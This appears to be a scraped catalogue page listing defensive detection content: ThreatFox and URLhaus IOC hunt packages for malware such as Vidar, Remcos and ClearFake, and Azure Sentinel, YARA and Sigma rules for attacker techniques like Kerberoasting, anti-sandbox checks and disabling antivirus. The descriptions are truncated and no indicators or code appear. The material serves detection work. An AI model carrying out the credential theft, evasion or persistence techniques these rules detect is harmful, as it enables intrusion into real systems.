iocjs-clearfakethreatfox
ThreatFox source
DnsEventsUrlClickEvents

Hunt package for 12 IOCs associated with Unknown malware

iocthreatfoxunknown
ThreatFox source
DnsEventsUrlClickEvents

Hunt package for 25 IOCs associated with Unknown Loader

iocthreatfoxunknown_loader
ThreatFox source
DnsEventsUrlClickEvents

Hunt package for 9 IOCs associated with Unknown Stealer

infostealeriocthreatfoxunknown_stealer
ThreatFox source
CommonSecurityLogDeviceNetworkEventsDnsEvents

Hunt package for 10 IOCs associated with Nanocore RAT

backdooriocthreatfoxwin-nanocore
ThreatFox: Remcos IOCs
ioc-hunt high
ThreatFox source
CommonSecurityLogDeviceNetworkEventsDnsEvents

Hunt package for 2 IOCs associated with Remcos

iocthreatfoxwin-remcos
ThreatFox source
CommonSecurityLogDeviceNetworkEvents

Hunt package for 5 IOCs associated with ValleyRAT

backdooriocthreatfoxwin-valley_rat
ThreatFox: Vidar IOCs
ioc-hunt high
ThreatFox source
DnsEventsUrlClickEvents

Vidar is a credential-stealing malware that exfiltrates sensitive data via encrypted channels, often targeting financial institutions and using persistence mechanisms to maintain long-term access.

iocthreatfoxwin-vidar
URLhaus source
CommonSecurityLogDnsEvents

Hunt package for 44 malicious URLs tagged as 32-bit

iocurlhaus
URLhaus source
CommonSecurityLogDnsEvents

Hunt package for 40 malicious URLs tagged as ClearFake

iocurlhaus
URLhaus source
CommonSecurityLogDnsEvents

Hunt package for 9 malicious URLs tagged as malware_download

iocurlhaus
URLhaus source
CommonSecurityLogDnsEvents

Hunt package for 2 malicious URLs tagged as mirai

iocurlhaus
URLhaus source
CommonSecurityLogDnsEvents

Hunt package for 5 malicious URLs tagged as Mozi

iocurlhaus
Azure-Sentinel source
T1078

'The alert shows users that join a Zoom meeting from a time zone other than the one the meeting was created in. You can also whitelist known good time zones in the tz_whitelist value using the tz data

microsoftofficial
Yara-Rules source

The following rule is referenced from AlienVault's Yara rule repository. This rule contains additional processes and driver names.

community
Yara-Rules source

Affect hook table

community
Azure-Sentinel source
T1040

'This alerts when end to end encryption is disabled for Zoom meetings.'

microsoftofficial
Azure-Sentinel source
T1098T1078
SecurityEventWindowsEvent

'Identifies accounts that are added to a privileged group and then quickly removed, which could be a sign of compromise.'

microsoftofficial
Azure-Sentinel source
T1098
SecurityEventWindowsEvent

'Identifies whenever a user account has the setting "Password Never Expires" in the user account properties selected. This is indicated in Security event 4738 in the EventData item labeled UserAccount

microsoftofficial
Azure-Sentinel source
T1078.004
SigninLogs

'Detects successful signins using single factor authentication where the device, location, and ASN are abnormal. Single factor authentications pose an opportunity to access compromised accounts, inve

backdoormicrosoftofficial
Azure-Sentinel source
T1190
W3CIISLog

'Identifies connection attempts (success or fail) from clients with very short or very long User Agent strings and with less than 100 connection attempts.'

microsoftofficial
Yara-Rules source

Checks if being debugged

community
Yara-Rules source

Checks for the presence of known debug tools

community
Yara-Rules source

Anti-Sandbox checks for Anubis

community
Yara-Rules source

Anti-Sandbox checks for CWSandbox

community
Yara-Rules source

Anti-Sandbox checks for Joe Sandbox

community
Yara-Rules source

Anti-Sandbox checks for Sandboxie

community
Yara-Rules source

Anti-Sandbox checks for ThreatExpert

community
Yara-Rules source

AntiVM checks for Bios version

community
Yara-Rules source

AntiVM checks for VirtualBox

community
Yara-Rules source

AntiVM checks for VMWare

community
Azure-Sentinel source
T1078.004
AADNonInteractiveUserSignInLogsSigninLogs

Detects when there is a login attempt from a country that has not seen a successful login in the previous 14 days. Threat actors may attempt to authenticate with credentials from compromised accounts

backdoorcredential-theftmicrosoftofficial
Azure-Sentinel source
T1078.004
IdentityInfoSigninLogs

'Detects when a privileged user account successfully authenticates from a location, device or ASN that another admin has not logged in from in the last 7 days. Privileged accounts are a key target f

backdoormicrosoftofficial
Yara-Rules source

YARA rule: Check_FindWindowA_iat

community
Yara-Rules source

YARA rule: Check_OutputDebugStringA_iat

community
Yara-Rules source

YARA rule: check_RaiseException_iat

community
Yara-Rules source

YARA rule: Check_unhandledExceptionFiler_iat

community
Yara-Rules source

Anti-debug process memory working set size check

community
Yara-Rules source

Disable AntiVirus

community
Disable Firewall
yara low
Yara-Rules source

Disable Firewall

community
Yara-Rules source

Disable Registry editor

community
Yara-Rules source

Disable User Access Control

community
Azure-Sentinel source
T1110
SecurityEventWindowsEvent

'Identifies when failed logon attempts are 20 or higher during a 10 minute period (2 failed logons per minute minimum) from a valid account.'

microsoftofficial
Azure-Sentinel source
T1110
W3CIISLog

'Identifies when 20 or more failed attempts from a given client IP in 1 minute occur on the IIS server. This could be indicative of an attempted brute force. This could also simply indicate a misconfi

credential-theftmicrosoftofficial
Azure-Sentinel source
T1078T1110
SigninLogs

'Identifies an interrupted sign-in session from a country the user has not signed in from before in the last 7 days, where the password was correct. Although the session is interrupted by other controls such

credential-theftmicrosoftofficial
Azure-Sentinel source
T1098T1078
SecurityEventWindowsEvent

'Identifies when a user account was created and then added to the builtin Administrators group in the same day. This should be monitored closely and all additions reviewed.'

backdoormicrosoftofficial
Azure-Sentinel source
T1078.004
IdentityInfoSigninLogs

'Detects a successful logon by a privileged account from an ASN not logged in from in the last 14 days. Monitor these logons to ensure they are legitimate and identify if there are any similar sign

microsoftofficial
Azure-Sentinel source
T1078.004

'Detects when there is a Service Principal login attempt from a country that has not seen a successful login in the previous 14 days. Threat actors may attempt to authenticate with credentials from

backdoorcredential-theftmicrosoftofficial
Azure-Sentinel source
T1134
SecurityEvent

'This query identifies whether an Active Directory user object was assigned a service principal name which could indicate that an adversary is preparing for performing Kerberoasting. This query check

microsoftofficial
Azure-Sentinel source
T1190
SecurityEventWindowsEvent

'This query looks for new processes being spawned by the Exchange UM service where that process has not previously been observed before. Reference: https://www.microsoft.com/security/blog/2021/03/02/

microsoftofficial
Azure-Sentinel source
T1190

'This query looks for errors that may indicate that an attacker is attempting to exploit a vulnerability in the service. Reference: https://www.microsoft.com/security/blog/2021/03/02/hafnium-targetin

exploitmicrosoftofficial
Azure-Sentinel source
T1055
SecurityEventWindowsEvent

'Identifies a match across various data feeds for named pipe IOCs related to the Solorigate incident. For the sysmon events required for this detection, logging for Named Pipe Events needs to be conf

microsoftofficial
ThreatFox source
DnsEvents

Hunt package for 163 IOCs associated with ClearFake

iocjs-clearfakethreatfox
ThreatFox: KongTuke IOCs
ioc-hunt high
ThreatFox source
DnsEventsUrlClickEvents

Hunt package for 4 IOCs associated with KongTuke

iocjs-kongtukethreatfox
ThreatFox source
DnsEventsUrlClickEvents

Hunt package for 2 IOCs associated with Unknown malware

iocthreatfoxunknown
ThreatFox source
DnsEvents

Hunt package for 2 IOCs associated with StrelaStealer

infostealeriocthreatfoxwin-strelastealer
ThreatFox: Vidar IOCs
ioc-hunt high
ThreatFox source
DnsEventsUrlClickEvents

Hunt package for 28 IOCs associated with Vidar

iocthreatfoxwin-vidar
URLhaus source
CommonSecurityLogDnsEvents

Hunt package for 36 malicious URLs tagged as 32-bit

iocurlhaus
URLhaus source
CommonSecurityLogDnsEvents

Hunt package for 11 malicious URLs tagged as 45-156-87-194

iocurlhaus
URLhaus source
CommonSecurityLogDnsEvents

Hunt package for 37 malicious URLs tagged as ClearFake

iocurlhaus
URLhaus source
CommonSecurityLogDnsEvents

Hunt package for 2 malicious URLs tagged as elf

iocurlhaus
URLhaus source
CommonSecurityLogDnsEvents

Hunt package for 3 malicious URLs tagged as malware_download

iocurlhaus
URLhaus source
CommonSecurityLogDnsEvents

The Mirai malware family is a botnet that compromises IoT devices to launch large-scale DDoS

iocurlhaus
URLhaus source
CommonSecurityLogDnsEvents

Hunt package for 8 malicious URLs tagged as Mozi

iocurlhaus
Azure-Sentinel source
T1098T1078
SecurityEventWindowsEvent

'Identifies when a user account has been added to a privileged built in domain local group or global group such as the Enterprise Admins, Cert Publishers or DnsAdmins. Be sure to verify this is an exp

microsoftofficial
Azure-Sentinel source
T1098T1078
SecurityEventWindowsEvent

'Identifies when a user account is created and then deleted within 10 minutes. This can be an indication of compromise and an adversary attempting to hide in the noise.'

microsoftofficial
Azure-Sentinel source
T1098T1078
SecurityEventWindowsEvent

'Identifies when a user account is enabled and then disabled within 10 minutes. This can be an indication of compromise and an adversary attempting to hide in the noise.'

microsoftofficial
Azure-Sentinel source
T1190T1203

'This query uses the Azure Defender Security Nested Recommendations data to find machines vulnerable to OMIGOD CVE-2021-38647. OMI is the Linux equivalent of Windows WMI and helps users manage configu

backdoorexploitmicrosoftofficialwmi
Azure-Sentinel source
T1552
SecurityEvent

'This detection uses Security events from the "AD FS Auditing" provider to detect suspicious object identifiers (OIDs) as part of EventID 501 and specifically part of the Enhanced Key Usage attributes. T

microsoftofficial
Azure-Sentinel source
T1078
SecurityEvent

'This query detects modification in the AdminSDHolder in the Active Directory which could indicate an attempt for persistence. AdminSDHolder Modification is a persistence technique in which an attac

backdoormicrosoftofficialpersistence
Check Debugger
yara low
Yara-Rules source

YARA rule: Check_Debugger

community
Check Dlls
yara low
Yara-Rules source

YARA rule: Check_Dlls

community
Check DriveSize
yara low
Yara-Rules source

YARA rule: Check_DriveSize

community
Check FilePaths
yara low
Yara-Rules source

The 'Check_FilePaths

community
Yara-Rules source

YARA rule: Check_Qemu_Description

community
Yara-Rules source

YARA rule: Check_Qemu_DeviceMap

community
Check UserNames
yara low
Yara-Rules source

YARA rule: Check_UserNames

community
Yara-Rules source

YARA rule: Check_VBox_Description

community
Yara-Rules source

The 'Check_VBox_DeviceMap' rule detects potential malicious activity involving VirtualBox device mapping, such as unauthorized device redirection or suspicious

community
Yara-Rules source

YARA rule: Check_VBox_Guest_Additions

community
Yara-Rules source

YARA rule: Check_VBox_VideoDrivers

community
Check VmTools
yara low
Yara-Rules source

The 'Check_VmTools' YARA rule detects artifacts associated with virtual machine tools, which may indicate evasion techniques or malicious activity in virtualized environments

community
Yara-Rules source

YARA rule: Check_VMWare_DeviceMap

community
Check Wine
yara low
Yara-Rules source

YARA rule: Check_Wine

community
Azure-Sentinel source
T1543

'This query uses Sysmon Image Load (Event ID 7) and Process Create (Event ID 1) data to look for COM Event System being used to load a newly seen DLL.'

microsoftofficial
Yara-Rules source

YARA rule: DebuggerPattern__CPUID

community
Yara-Rules source

YARA rule: DebuggerPattern__SEH_Inits

community
Yara-Rules source

YARA rule: DebuggerPattern__SEH_Saves

community
Azure-Sentinel source
T1098

'This query detects an abuse of the DSRM account in order to maintain persistence and access to the organization's Active Directory. Ref: https://adsecurity.org/?p=1785'

microsoftofficialpersistence
Azure-Sentinel source
T1564
SecurityEvent

'This query detects domain user accounts creation (event ID 4720) where the username ends with $. Accounts that end with $ are normally domain computer accounts and when they are created the event ID

backdoormicrosoftofficial
Azure-Sentinel source
T1098T1078
SecurityEventWindowsEvent

'Identifies when a recently created Group was added to a privileged built in domain local group or global group such as the Enterprise Admins, Cert Publishers or DnsAdmins. Be sure to verify this is

microsoftofficial
Azure-Sentinel source
T1052
CloudAppEventsDeviceEventsDeviceFileEventsSecurityAlert

'This query looks for any mass download by a single user with possible file copy activity to a new USB drive. Malicious insiders may perform such activities that may cause harm to the organization. T

microsoftofficial
Azure-Sentinel source
T1005
SecurityEventWindowsEvent

'This detection uses Windows security events to detect suspicious access attempts to the registry key of Microsoft Entra ID Health monitoring agent. This detection requires an access control entry (AC

microsoftofficial
Azure-Sentinel source
T1005
SecurityEventWindowsEvent

'This detection uses Windows security events to detect suspicious access attempts to the registry key values and sub-keys of Microsoft Entra ID Health service agents (e.g AD FS). Information from AD H

backdoormicrosoftofficial
Azure-Sentinel source
T1059
SecurityEventWindowsEvent

'This query identifies when a process execution command-line indicates that a registry value is written to allow for later execution of a malicious script. References: https://www.microsoft.com/security/

microsoftofficial
Azure-Sentinel source
T1547
SecurityEventWindowsEvent

'This query identifies when rundll32.exe executes a specific set of inline VBScript commands. References: https://www.microsoft.com/security/blog/2021/03/04/goldmax-goldfinder-sibot-analyzing-nobelium-

microsoftofficial
Azure-Sentinel source
T1546.008

'Adversaries may establish persistence and/or elevate privileges by executing malicious content triggered by accessibility features. Windows contains accessibility features that may be launched with a

backdoormicrosoftofficialpersistence
Azure-Sentinel source
T1021
SecurityEventWindowsEvent

'Identifies when an RDP connection is made to multiple systems and above the normal connection count for the previous 7 days. Connections from the same system with the same account within the same day

microsoftofficial
Azure-Sentinel source
T1134
SecurityEvent

'This query identifies Active Directory computer objects modifications that allow an adversary to abuse the Resource-based constrained delegation. This query checks for event id 5136 that the Object

microsoftofficial
Azure-Sentinel source
T1554
SecurityEventWindowsEvent

'The query looks for source code files being modified immediately after a build process is started. The purpose of this is to look for malicious code injection during the build process. More details:

microsoftofficial
Azure-Sentinel source
T1558
SecurityEventWindowsEvent

'A service principal name (SPN) is used to uniquely identify a service instance in a Windows environment. Each SPN is usually associated with a service account. Organizations may have used service acc

backdoormicrosoftofficial
Azure-Sentinel source
T1021
SecurityEventWindowsEvent

'Identifies when an RDP connection is new or rare related to any logon type by a given account today compared with the previous 14 days. RDP connections are indicated by the EventID 4624 with LogonTyp

microsoftofficial
RDP Nesting
kql medium
Azure-Sentinel source
T1021
SecurityEventWindowsEvent

'Query detects potential lateral movement within a network by identifying when an RDP connection (EventID 4624, LogonType 10) is made to an initial system, followed by a subsequent RDP connection from

lateral-movementmicrosoftofficial
SEH Init
yara low
Yara-Rules source

YARA rule: SEH_Init

community
SEH Save
yara low
Yara-Rules source

YARA rule: SEH_Save

community
Azure-Sentinel source
T1195
SecurityAlert

'Surfaces any Defender Alert for Solorigate Events. In Microsoft Sentinel the SecurityAlerts table includes only the Device Name of the affected device, this query joins the DeviceInfo table to clearl

microsoftofficial
ThreatFox: Mirai IOCs
ioc-hunt high
ThreatFox source
CommonSecurityLogDeviceNetworkEvents

Hunt package for 3 IOCs associated with Mirai

elf-miraiiocthreatfox
ThreatFox source
DnsEvents

Hunt package for 63 IOCs associated with ClearFake

iocjs-clearfakethreatfox
ThreatFox: AMOS IOCs
ioc-hunt high
ThreatFox source
UrlClickEvents

Hunt package for 7 IOCs associated with AMOS

iocosx-amosthreatfox
ThreatFox source
CommonSecurityLogDeviceNetworkEventsDnsEventsUrlClickEvents

Hunt package for 7 IOCs associated with Unknown malware

iocthreatfoxunknown
ThreatFox source
UrlClickEvents

The "Unknown Loader" malware is a downloader that

iocthreatfoxunknown_loader
ThreatFox source
DnsEventsUrlClickEvents

The "Unknown Stealer" malware is a data-exfiltration

infostealeriocthreatfoxunknown_stealer
ThreatFox: AsyncRAT IOCs
ioc-hunt high
ThreatFox source
DnsEvents

Hunt package for 2 IOCs associated with AsyncRAT

backdooriocthreatfoxwin-asyncrat
ThreatFox source
DnsEvents

Hunt package for 2 IOCs associated with Nanocore RAT

backdooriocthreatfoxwin-nanocore
ThreatFox source
DnsEventsUrlClickEvents

Hunt package for 15 IOCs associated with NetSupportManager RAT

backdooriocthreatfoxwin-netsupportmanager_rat
ThreatFox: Vidar IOCs
ioc-hunt high
ThreatFox source
DnsEventsUrlClickEvents

Hunt package for 87 IOCs associated with Vidar

iocthreatfoxwin-vidar
URLhaus source
CommonSecurityLogDnsEvents

Hunt package for 26 malicious URLs tagged as 32-bit

iocurlhaus
URLhaus source
CommonSecurityLogDnsEvents

Hunt package for 26 malicious URLs tagged as ClearFake

iocurlhaus
URLhaus source
CommonSecurityLogDnsEvents

Hunt package for 30 malicious URLs tagged as elf

iocurlhaus
URLhaus source
CommonSecurityLogDnsEvents

Hunt package for 7 malicious URLs tagged as Mozi

iocurlhaus
URLhaus source
CommonSecurityLogDnsEvents

Hunt package for 2 malicious URLs tagged as sh

iocurlhaus
URLhaus source
CommonSecurityLogDnsEvents

Hunt package for 7 malicious URLs tagged as ua-wget

iocurlhaus
Yara-Rules source

Possibly employs anti-virtualization techniques

community
Azure-Sentinel source
T1078T1489
AzureActivityIdentityInfoSecurityAlert

'This query will alert on any sign-ins from devices infected with malware in correlation with workspace deletion activity. Attackers may attempt to delete workspaces containing compute instances afte

backdoormicrosoftofficial
SigmaHQ source
T1112T1059.005
imRegistry

Detects suspicious registry modifications made by suspicious processes, such as script engine processes like WScript or CScript. These processes are rarely used for legitimate registry modifica

evasionpersistence
SigmaHQ source
T1021.002T1059.005
imFileEvent

Detects file creation events indicating NetExec (nxc.exe) execution on the local machine. NetExec is a PyInstaller-bundled binary that extracts its embedded data files to a "_MEI<random>" directory un

backdoorcredential-theftexploitlateral-movement
SigmaHQ source
T1547.005
imRegistry

Detects the addition of a SSP to the registry. Upon a reboot or API call, SSP DLLs gain access to encrypted and plaintext passwords stored in Windows.

backdoor
SigmaHQ source
T1018T1021
imProcessCreate

Detects execution of the hacktool NetExec. NetExec (formerly CrackMapExec) is a widely used post-exploitation tool designed for Active Directory penetration testing and network enumeration. In enterpri

backdoorcredential-theftexploit
Azure-Sentinel source
T1189

'This rule identifies a web request to a URL that holds a file type, including .ps1, .bat, .vbs, and .scr that can be harmful if downloaded. This analytic rule uses [ASIM](https://aka.ms/AboutASIM) an

microsoftofficial
Azure-Sentinel source
T1496

'This rule identifies a web request with a user agent header known to belong to a crypto miner. This indicates a crypto miner may have infected the client machine. You can add custom crypto mining

microsoftofficial
Azure-Sentinel source
T1059T1046T1021T1557T1102T1020

'This rule identifies a web request with a user agent header known to belong to a hacking tool. This indicates a hacking tool is used on the host. You can add custom hacking tool indicating User-Ag

microsoftofficial
Azure-Sentinel source
T1132T1140T1059.001

'This rule identifies a web request with a user agent header known to belong to PowerShell. You can add custom PowerShell indicating User-Agent headers using a watchlist, for more information refer t

microsoftofficialpowershell
Azure-Sentinel source
T1136.003
AuditLogsSigninLogs

'This query looks for an account being created from a domain that is not regularly seen in a tenant. Attackers may attempt to add accounts from these sources as a means of establishing persistent ac

backdoormicrosoftofficial
Azure-Sentinel source
T1078.004
AuditLogsIdentityInfo

'Detects when a Temporary Access Pass (TAP) is created for a Privileged Account. A Temporary Access Pass is a time-limited passcode issued by an admin that satisfies strong authentication requiremen

backdoormicrosoftofficial
Azure-Sentinel source
T1005
DeviceEventsSecurityEventWindowsEvent

'Identifies an export of the ADFS DKM Master Key from Active Directory. References: https://blogs.microsoft.com/on-the-issues/2020/12/13/customers-protect-nation-state-cyberattacks/, https://cloud.go

aptbackdoormicrosoftofficial
Azure-Sentinel source
T1199T1136T1078T1098
AADNonInteractiveUserSignInLogsOfficeActivitySigninLogs

'Detects anomalous IP address usage by user accounts and then checks to see if a suspicious Teams action is performed. Query calculates IP usage Delta for each user account and selects accounts where

microsoftofficial
Azure-Sentinel source
T1078
SigninLogs

'Identifies sign-in anomalies from an IP in the last hour, targeting multiple users where the password is correct after multiple attempts'

microsoftofficial
Azure-Sentinel source
T1211T1059T1190T0890
AzureDiagnostics

'Identifies a match for SQL Injection attack in the Application gateway WAF logs. The Threshold value in the query can be changed as per your infrastructure's requirement. References: https://owasp.o

microsoftofficial
Azure-Sentinel source
T1189T1203T0853
AzureDiagnostics

'Identifies a match for XSS attack in the Application gateway WAF logs. The Threshold value in the query can be changed as per your infrastructure's requirement. References: https://owasp.org/www-pro

microsoftofficial
Azure-Sentinel source
T1078.004
AuditLogs

'Detects changes to an Application ID URI. Monitor these changes to make sure that they were authorized. Ref: https://docs.microsoft.com/azure/active-directory/fundamentals/security-operations-app

backdoormicrosoftofficial
Azure-Sentinel source
T1078.004
AuditLogs

'Detects the redirect URL of an app being changed. Applications associated with URLs not controlled by the organization can pose a security risk. Ref: https://docs.microsoft.com/azure/active-direc

backdoormicrosoftofficial
Azure-Sentinel source
AuditLogs

'Identifies if an AV scan fails in Azure App Services.'

microsoftofficial
Azure-Sentinel source
AuditLogs

'Identifies if an AV scan finds infected files in Azure App Services.'

microsoftofficial
Azure-Sentinel source
T1204
DeviceProcessEventsSecurityEvent

This detects attempts to manipulate audit policies using auditpol command. This technique was seen in relation to Solorigate attack but the results can indicate potential malicious activity used in di

backdoormicrosoftofficial
Azure-Sentinel source
T1486
SecurityAlert

'This query looks for Microsoft Defender AV detections related to Dev-0530 actors. In Microsoft Sentinel the SecurityAlerts table includes only the Device Name of the affected device, this query join

microsoftofficial
Azure-Sentinel source
T1486
SecurityAlert

'This query looks for Microsoft Defender AV detections related to Europium actor. In Microsoft Sentinel the SecurityAlerts table includes only the Device Name of the affected device, this query join

microsoftofficial
Azure-Sentinel source
T1486
SecurityAlert

'This query looks for Microsoft Defender AV detections related to Hive Ransomware. In Microsoft Sentinel the SecurityAlerts table includes only the Device Name of the affected device, this query joins

microsoftofficialransomware
Azure-Sentinel source
T1562.008
AzureActivity

'This query looks for diagnostic settings that are removed from a resource. This could indicate an attacker or malicious internal trying to evade detection before malicious act is performed. If the di

microsoftofficial
Azure-Sentinel source
T1570T1212
AzureActivityBehaviorAnalytics

'Identifies when the Azure Run Command operation is executed by a UserPrincipalName and IP Address that has resulted in a recent user entity behaviour alert.'

backdoormicrosoftofficial
Azure-Sentinel source
T1570T1059.001
AzureActivityDeviceEventsDeviceFileEvents

'Identifies when Azure Run command is used to execute a PowerShell script on a VM that is unique. The uniqueness of the PowerShell script is determined by taking a combined hash of the cmdLets it impo

backdoormicrosoftofficialpowershell
Azure-Sentinel source
T1078.004
AuditLogs

'Detects changes to an application's sign-out URL. Look for any modifications to a sign-out URL. Blank entries or entries to non-existent locations would stop a user from terminating a session. Ref

backdoormicrosoftofficial
Azure-Sentinel source
T1078.004
AuditLogs

'Detects changes to the ownership of an application. Monitor these changes to make sure that they were authorized. Ref: https://learn.microsoft.com/en-gb/entra/architecture/security-operations-ap

backdoormicrosoftofficial
Azure-Sentinel source
T1078.004
AuditLogs

'PIM provides a key mechanism for assigning privileges to accounts, this query detects changes to PIM role settings. Monitor these changes to ensure they are being made legitimately and don't confer

backdoormicrosoftofficial
Azure-Sentinel source
T1078
AADNonInteractiveUserSignInLogsCommonSecurityLogSigninLogs

'Correlate IPs blocked by a Cisco firewall appliance with successful Microsoft Entra ID signins. Because the IP was blocked by the firewall, that same IP logging on successfully to Entra ID is potenti

credential-theftmicrosoftofficial
Azure-Sentinel source

'IP addresses of broadband links that usually indicates users attempting to access their home network, for example for a remote session to a home computer.'

backdoormicrosoftofficial
Azure-Sentinel source

'Detects first connection to an unpopular website (possible malicious payload delivery).'

microsoftofficial
Azure-Sentinel source

'Detects suspicious user agent strings used by crypto miners in proxy logs.'

microsoftofficial
Azure-Sentinel source

'Rule helps to detect empty and unusual user agent indicating web browsing activity by an unusual process other than a web browser.'

microsoftofficial
Azure-Sentinel source

'Detects suspicious user agent strings used by known hack tools'

microsoftofficial
Azure-Sentinel source

'Rule helps to detect a rare user-agents indicating web browsing activity by an unusual process other than a web browser.'

microsoftofficial
Azure-Sentinel source

'It is recommended that these categories should be blocked by policies because they provide harmful/malicious content.'

microsoftofficial
Azure-Sentinel source

'Detects request to potentially harmful file types (.ps1, .bat, .vbs, etc.).'

microsoftofficial
Azure-Sentinel source

'Malware can use IP address to communicate with C2.'

microsoftofficial
Azure-Sentinel source

'Rule helps to detect Powershell user-agent activity by an unusual process other than a web browser.'

microsoftofficialpowershell
Azure-Sentinel source
T1574
DeviceRegistryEventsSecurityEvent

'This query looks for changes to COM registry keys to point to files in C:\Windows\System32\spool\drivers\color\. This can be used to enable COM hijacking for persistence. Ref: https://www.microso

exploitmicrosoftofficialpersistence
Azure-Sentinel source
T1078.004
AuditLogs

'Detects a Conditional Access Policy being modified by a user who has not modified a policy in the last 14 days. A threat actor may try to modify policies to weaken the security controls in place.

backdoormicrosoftofficial
Azure-Sentinel source
T1567.002T1102.002
CommonSecurityLog

'CreepyDrive uses OneDrive for command and control; however, it makes regular requests to predictable paths. This detection will alert when over 20 sequences are observed in a single day.'

microsoftofficial
CreepyDrive URLs
kql high
Azure-Sentinel source
T1567.002T1102.002
CommonSecurityLog

'CreepyDrive uses OneDrive for command and control. This detection identifies URLs specific to CreepyDrive.'

microsoftofficial
Azure-Sentinel source
T1098T1078
AuditLogs

'Privileged Identity Management (PIM) generates alerts when there is suspicious or unsafe activity in Microsoft Entra ID (Azure AD) organization. This query will help detect attackers attempts to dis

backdoormicrosoftofficial
Azure-Sentinel source
T1078T1548
AuditLogsOfficeActivitySecurityAlert

'This hunting query will alert on any Impossible travel activity in correlation with mailbox permission tampering followed by account being added to a PIM managed privileged group. Ensure this impossi

microsoftofficial
Azure-Sentinel source
T1569T1003
DeviceProcessEventsSecurityAlert

'This hunting query looks for file paths/hashes related to observed activity by Dev-0228. The actor is known to use custom version of popular tool like PsExec, Procdump etc. to carry its activity. Th

lateral-movementmicrosoftofficial
Azure-Sentinel source
T1486
DeviceFileEventsimFileEvent

'Dev-0530 actors are known to encrypt the contents of the victims device as well as renaming the file extensions. This query looks for the creation of files with .h0lyenc extension or presence of rans

microsoftofficialransomware
Azure-Sentinel source
T1068T1078
DeviceProcessEventsSecurityEventWindowsEvent

This query detects attempts to add attacker devices as allowed IDs for ActiveSync using the Set-CASMailbox command. This technique was seen in relation to the Solorigate attack but the results can indica

backdoormicrosoftofficialpowershell
Azure-Sentinel source
T1078.004
AuditLogs

'Detects a user's consent to an OAuth application being blocked due to it being too risky. These events should be investigated to understand why the user attempted to consent to the application and

backdoormicrosoftofficial
Azure-Sentinel source
T1071T1003
CommonSecurityLogDeviceFileEventsDeviceImageLoadEventsDeviceNetworkEventsDnsEventsOfficeActivityVMConnectionimFileEvent

'Identifies a match across various data feeds for hashes and IP IOC related to Europium Reference: https://www.microsoft.com/security/blog/2022/09/08/microsoft-investigates-iranian-attacks-against-t

microsoftofficial
Azure-Sentinel source
T1059.001T1059.003
DeviceProcessEventsW3CIISLog

'This query dynamically identifies Exchange servers and then looks for instances where the IIS worker process initiates a call out to a remote URL using either cmd.exe or powershell.exe. This behaviou

exploitmicrosoftofficialpowershell
Azure-Sentinel source
T1078T1110
SigninLogs

'Identifies a list of IP addresses with a minimum number (default of 5) of failed logon attempts to AWS Console. Uses that list to identify any successful Microsoft Entra ID logons from these IPs with

microsoftofficial
Azure-Sentinel source
T1078T1110
AADNonInteractiveUserSignInLogsSigninLogs

'Identifies a list of IP addresses with a minimum number (default of 5) of failed logon attempts to Microsoft Entra ID. Uses that list to identify any successful AWS Console logons from these IPs with

microsoftofficial
Azure-Sentinel source
T1078T1110
AADNonInteractiveUserSignInLogsSecurityEventSigninLogsSyslogWindowsEvent

'Identifies a list of IP addresses with a minimum number (default of 5) of failed logon attempts to Microsoft Entra ID. Uses that list to identify any successful remote logons to hosts from these IPs

microsoftofficial
Azure-Sentinel source
T1078T1110
AADNonInteractiveUserSignInLogsSecurityEventSigninLogsSyslogWindowsEvent

'Identifies a list of IP addresses with a minimum number (default of 5) of failed logon attempts to remote hosts. Uses that list to identify any successful logons to Microsoft Entra ID from these IPs w

microsoftofficial
Azure-Sentinel source
T1071T1571
CommonSecurityLog

'Identifies patterns in the time deltas of contacts between internal and external IPs in Fortinet network data that are consistent with beaconing. Accounts for randomness (jitter) and seasonality suc

aptcobalt-strikemicrosoftofficial
Azure-Sentinel source
T1210
SecurityEventWindowsEvent

'This query detects instances where an attacker has gained the ability to execute code on an ADFS Server through remote WMI Execution. In order to use this query you need to be collecting Sysmon Event

microsoftofficialwmi
Azure-Sentinel source
T1078.004
AuditLogs

'Detects when a Guest User is added by a user account that has not been seen adding a guest in the previous 14 days. Monitoring guest accounts and the access they are provided is important to detect

backdoormicrosoftofficial
Azure-Sentinel source
T1078T1098T1114
OfficeActivitySigninLogs

'It is possible that a disabled user account is compromised and another account on the same IP is used to perform operations that are not typical for that user. The query filters the SigninLogs for e

backdoormicrosoftofficial
Azure-Sentinel source
T1570
DeviceProcessEventsSecurityEventimProcessCreate

'The query below identifies powershell commands used by the threat actor Mango Sandstorm. Reference: https://www.microsoft.com/security/blog/2022/08/25/mercury-leveraging-log4j-2-vulnerabilities-in-u

microsoftofficialpowershell
Azure-Sentinel source
T1041T1071.001
CommonSecurityLogDeviceNetworkEvents

'This detection will identify network requests in HTTP proxy data that contain Base64 encoded IP addresses. After identifying candidates, the query joins with DeviceNetworkEvents to identify any machi

backdoormicrosoftofficial
Azure-Sentinel source
T1078T1110
AADNonInteractiveUserSignInLogsCommonSecurityLogSigninLogs

This query creates a list of IP addresses with the number of failed login attempts to Entra ID above a set threshold (default of 5). It then looks for any successful Palo Alto VPN logins from any

microsoftofficial
Azure-Sentinel source
T1071
AzureDiagnosticsCommonSecurityLogVMConnection

'Matches domain name IOCs related to Forest Blizzard group activity published July 2019 with CommonSecurityLog, DnsEvents and VMConnection dataTypes. References: https://blogs.microsoft.com/on-the-iss

microsoftofficial
Azure-Sentinel source
T1078
CommonSecurityLogSecurityAlertSigninLogs

'This content is employed to correlate with Microsoft Defender XDR phishing-related alerts. It focuses on instances where a user successfully connects to a phishing URL from a non-Microsoft network de

microsoftofficialphishing
Azure-Sentinel source
T1189T1071T1203
AADNonInteractiveUserSignInLogsAzureDiagnosticsOfficeActivitySigninLogsW3CIISLog

'Malware authors will sometimes hardcode user agent string values when writing the network communication component of their malware. Malformed user agents can be an indication of such malware.'

microsoftofficial
Azure-Sentinel source
T1071
AzureDiagnosticsCommonSecurityLogDeviceFileEventsDeviceImageLoadEventsDeviceNetworkEventsDnsEventsOfficeActivityVMConnectionimFileEvent

'Identifies a match across various data feeds for domains, hashes and IP IOC related to Mercury Reference: https://www.microsoft.com/security/blog/2022/08/25/mercury-leveraging-log4j-2-vulnerabiliti

microsoftofficial
Azure-Sentinel source
T1190
SecurityAlert

'This query looks for Microsoft Defender for Endpoint detections related to the remote command execution attempts on Azure IR with Managed VNet or SHIR. In Microsoft Sentinel, the SecurityAlerts tabl

exploitmicrosoftofficial
Azure-Sentinel source
T1499T1564
Heartbeat

'This detection will go over the heartbeats received from the agents of Domain Controllers over the last hour, and will create alerts if the last heartbeats were received an hour ago.'

microsoftofficial
Azure-Sentinel source
T1078T1110
